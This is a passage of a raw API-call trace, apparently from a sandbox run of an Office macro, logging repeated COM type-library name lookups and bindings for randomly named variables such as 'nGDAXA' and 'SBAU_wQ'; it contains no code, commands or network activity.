ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nGDAXA", lHashVal=0x103d2e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.070] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.070] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6214e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="nGDAXA") returned 7 [0069.070] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nGDAXA", lHashVal=0x103d2e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.071] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.071] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6214e | out: _Dst=0x67c2d40) returned 0x0 [0069.071] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nGDAXA") returned 0x10b7d7 [0069.071] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_nGDAXA" | out: _Dst="_B_var_nGDAXA") returned 0x0 [0069.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_nGDAXA") returned 14 [0069.071] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.071] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nGDAXA", lHashVal=0x10b7d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.071] IUnknown:Release (This=0x665ba50) returned 0xd [0069.071] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.071] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nGDAXA", lHashVal=0x10b7d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.071] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.071] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.071] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nGDAXA", lHashVal=0x10b7d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.071] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.071] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.071] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nGDAXA", lHashVal=0x10b7d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.071] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.071] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.071] IUnknown:Release (This=0x665ba50) returned 0xd [0069.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10e8e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_nGDAXA") returned 14 [0069.071] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nGDAXA", lHashVal=0x10b7d7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x58004100000000, pDummy=0x0) returned 0x0 [0069.071] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6214e | out: _Dst=0x144ec0) returned 0x0 [0069.072] ITypeComp:RemoteBind (in: This=0x665ba60, szName="SBAU_wQ", lHashVal=0x101b4f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62246, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SBAU_wQ") returned 8 [0069.072] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="SBAU_wQ", lHashVal=0x101b4f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62246, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SBAU_wQ") returned 8 [0069.072] ITypeComp:RemoteBind (in: This=0x665bd30, szName="SBAU_wQ", lHashVal=0x101b4f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.072] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SBAU_wQ") returned 0x101b4f [0069.072] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="SBAU_wQ" | out: _Dst="SBAU_wQ") returned 0x0 [0069.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="SBAU_wQ") returned 8 [0069.072] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.072] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="SBAU_wQ", lHashVal=0x101b4f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.072] IUnknown:Release (This=0x665ba50) returned 0xd [0069.072] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.072] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="SBAU_wQ", lHashVal=0x101b4f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.072] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.072] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.072] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="SBAU_wQ", lHashVal=0x101b4f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.072] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.072] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.072] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="SBAU_wQ", lHashVal=0x101b4f, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.072] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.072] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62246, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="SBAU_wQ") returned 8 [0069.072] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="SBAU_wQ", lHashVal=0x101b4f, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.072] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.073] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62246 | out: _Dst=0x67c2d40) returned 0x0 [0069.073] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_SBAU_wQ") returned 0x101ed3 [0069.073] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_SBAU_wQ" | out: _Dst="_B_var_SBAU_wQ") returned 0x0 [0069.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_SBAU_wQ") returned 15 [0069.073] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.073] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_SBAU_wQ", lHashVal=0x101ed3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.073] IUnknown:Release (This=0x665ba50) returned 0xd [0069.073] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.073] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_SBAU_wQ", lHashVal=0x101ed3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.073] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.073] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.073] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_SBAU_wQ", lHashVal=0x101ed3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.073] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.073] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.073] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_SBAU_wQ", lHashVal=0x101ed3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.073] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.073] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.073] IUnknown:Release (This=0x665ba50) returned 0xd [0069.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10ebe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_SBAU_wQ") returned 15 [0069.073] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_SBAU_wQ", lHashVal=0x101ed3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x5f005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x5f005500000000, pDummy=0x0) returned 0x0 [0069.073] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62246 | out: _Dst=0x144ec0) returned 0x0 [0069.073] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aABoQAUB", lHashVal=0x10f406, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6221a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aABoQAUB") returned 9 [0069.073] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aABoQAUB", lHashVal=0x10f406, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6221a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aABoQAUB") returned 9 [0069.074] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aABoQAUB", lHashVal=0x10f406, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aABoQAUB") returned 0x10f406 [0069.074] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="aABoQAUB" | out: _Dst="aABoQAUB") returned 0x0 [0069.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="aABoQAUB") returned 9 [0069.074] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.074] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aABoQAUB", lHashVal=0x10f406, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.074] IUnknown:Release (This=0x665ba50) returned 0xd [0069.074] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.074] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aABoQAUB", lHashVal=0x10f406, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.074] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.074] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.074] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aABoQAUB", lHashVal=0x10f406, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.074] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.074] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.074] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aABoQAUB", lHashVal=0x10f406, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.074] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6221a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="aABoQAUB") returned 9 [0069.074] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aABoQAUB", lHashVal=0x10f406, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.074] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.074] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a6221a | out: _Dst=0x67c2d40) returned 0x0 [0069.074] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aABoQAUB") returned 0x10cb8f [0069.074] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_aABoQAUB" | out: _Dst="_B_var_aABoQAUB") returned 0x0 [0069.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_aABoQAUB") returned 16 [0069.074] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.074] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aABoQAUB", lHashVal=0x10cb8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.074] IUnknown:Release (This=0x665ba50) returned 0xd [0069.075] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.075] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aABoQAUB", lHashVal=0x10cb8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.075] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.075] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.075] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aABoQAUB", lHashVal=0x10cb8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.075] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.075] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.075] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aABoQAUB", lHashVal=0x10cb8f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.075] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.075] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.075] IUnknown:Release (This=0x665ba50) returned 0xd [0069.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10eee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_aABoQAUB") returned 16 [0069.075] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aABoQAUB", lHashVal=0x10cb8f, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x51006f00000000, pDummy=0x0) returned 0x0 [0069.075] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a6221a | out: _Dst=0x144ec0) returned 0x0 [0069.075] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zBAG1A", lHashVal=0x103d4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6226e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBAG1A") returned 7 [0069.075] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zBAG1A", lHashVal=0x103d4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6226e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBAG1A") returned 7 [0069.075] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zBAG1A", lHashVal=0x103d4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.075] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zBAG1A") returned 0x103d4d [0069.075] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zBAG1A" | out: _Dst="zBAG1A") returned 0x0 [0069.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zBAG1A") returned 7 [0069.076] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.076] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zBAG1A", lHashVal=0x103d4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.076] IUnknown:Release (This=0x665ba50) returned 0xd [0069.076] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.076] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zBAG1A", lHashVal=0x103d4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.076] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.076] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.076] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zBAG1A", lHashVal=0x103d4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.076] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.076] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.076] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zBAG1A", lHashVal=0x103d4d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.076] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6226e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBAG1A") returned 7 [0069.076] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zBAG1A", lHashVal=0x103d4d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.076] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.076] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6226e | out: _Dst=0x67c2d40) returned 0x0 [0069.076] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zBAG1A") returned 0x10b7f6 [0069.076] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zBAG1A" | out: _Dst="_B_var_zBAG1A") returned 0x0 [0069.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zBAG1A") returned 14 [0069.076] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.076] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zBAG1A", lHashVal=0x10b7f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.076] IUnknown:Release (This=0x665ba50) returned 0xd [0069.076] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.076] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zBAG1A", lHashVal=0x10b7f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.076] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.076] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.076] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zBAG1A", lHashVal=0x10b7f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.076] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.077] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.077] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zBAG1A", lHashVal=0x10b7f6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.077] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.077] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.077] IUnknown:Release (This=0x665ba50) returned 0xd [0069.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10f1e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zBAG1A") returned 14 [0069.077] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zBAG1A", lHashVal=0x10b7f6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x31004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x31004700000000, pDummy=0x0) returned 0x0 [0069.077] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6226e | out: _Dst=0x144ec0) returned 0x0 [0069.077] ITypeComp:RemoteBind (in: This=0x665ba60, szName="i4Z_UAX", lHashVal=0x102fb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62296, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="i4Z_UAX") returned 8 [0069.077] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="i4Z_UAX", lHashVal=0x102fb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62296, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="i4Z_UAX") returned 8 [0069.077] ITypeComp:RemoteBind (in: This=0x665bd30, szName="i4Z_UAX", lHashVal=0x102fb4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, 